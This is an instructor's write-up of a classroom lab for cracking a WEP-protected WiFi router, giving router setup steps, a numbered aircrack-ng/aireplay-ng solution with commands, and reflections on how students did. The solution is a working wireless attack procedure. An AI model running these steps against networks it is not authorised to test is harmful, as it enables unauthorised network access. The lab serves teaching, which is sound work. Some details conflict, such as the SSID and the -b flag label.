Breaking WEP Encryption on a WiFi Router

07 Oct 2017

Overview

This exercise involves cracking the password on a WEP-protected WiFi router using the aircrack-ng utility suite. Students will understand why WEP is insecure and gain practical experience performing a replay-based attack.

Prerequisites

  • A Kali Linux instance:
    • No extra programs beyond those provided by a clean install are needed to complete this exercise.
  • A WEP-protected WiFi router; apply the following configuration steps to prepare it:
    • Reset the router to restore factory default settings.
    • Attach it to a client via Ethernet.
    • Navigate to 192.168.1.1 (or appropriate address for router); login using “admin” / no password (or appropriate credentials).
    • In System > Administration section, change admin’s password to “123$%^” or some other non-default password so students can’t gain access via the administrative panel.
    • In Wireless Settings:
      • Change SSID to “NetworkToHack”
      • Change authentication type to WEP
      • Disable Auto Channel Scan and set channel to 13 (this is important, without this the channel may change and students will likely run into obscure problems while cracking as a result)
      • Change password length to 128 bit
      • Change password to ASCII value “wachapakazitu” (or similar)
    • Remember to save settings before disconnecting Ethernet cable.
  • Several clients that can auto-connect to the router. These are needed so students can initiate a connection for replaying during the attack. As most operating systems support network password remembrance without the ability to view the password itself, any clients will do, so long as they are not the Kali instances the students will use for the attack itself. (I used several Ubuntu instances which are set up to dual-boot alongside Kali, so that a student could boot into Ubuntu and initiate the connection him/herself.)

Background Info to Provide Students

Provide students with the configured WEP-protected router, along with a copy of the book Kali Linux : Wireless Penetration Testing by Vivek Ramachandran and Cameron Buchanan. Have them start on page 60 and work through the steps themselves. Remind them that the goal is to both crack the password and use that password to connect to the network itself.

Solution

  1. $ ifconfig wlan0 up
    • To bring the wireless adapter up.
  2. $ airmon-ng start wlan0
    • To put the wireless adapter in monitor mode.
  3. $ iwconfig
    • To verify that the monitor interface is available (should be named wlan0mon or something similar)
  4. $ airodump-ng wlan0mon
    • To ensure that we can see the network “HackThisNetwork” broadcast by the provided WiFi router.
  5. $ airodump-ng --bssid <MAC_ADDR_OF_ROUTER> --channel <CHANNEL_OF_ROUTER> --write WEPCrackingDemo wlan0mon
    • To limit output to just the network being hacked; must get the –bssid and –channel values from the output of step 4.
  6. Connect a preconfigured client to the network.
  7. $ aireplay-ng -3 -b <SSID_OF_ROUTER> -h <MAC_ADDR_OF_TARGET_CLIENT> wlan0mon
    • Run this in a separate terminal while airodump-ng runs, and do it immediately after connecting the client in step 6.
    • -b is the MAC address of the router and -h is the MAC address of the preconfigured client that was connected to the vulnerable network in step 6.
    • You should see the value in the #Data column of airodump-ng’s output increase substantially as aireplay-ng replays the packets captured during association with the router.
  8. $ aircrack-ng WEPCrackingDemo-01.cap
    • To begin the cracking process; this should be done in a separate terminal from aireplay-ng and airodump-ng.
    • As IVs are added, aircrack-ng should pause and resume attempting to crack the key at successively higher IV counts (this is why aireplay-ng should be kept running in a separate terminal along with airodump-ng)
    • When the WEP key is cracked it will be displayed in hex and ASCII forms.
  9. Use the ASCII value of the decrypted WEP key output by aircrack-ng to connect a new, unconfigured client to the vulnerable network.

Reflections

Students succeeded in doing this exercise much faster than I expected, with minimal assistance. They followed along with the book themselves, and I had only to help them once by showing them that the MAC addresses and other parameters used in the book did not apply to their own router and computers, and thus needed to be replaced with the values displayed in the output of the commands that they ran themselves. After that, they proceeded to crack the WEP password entirely on their own.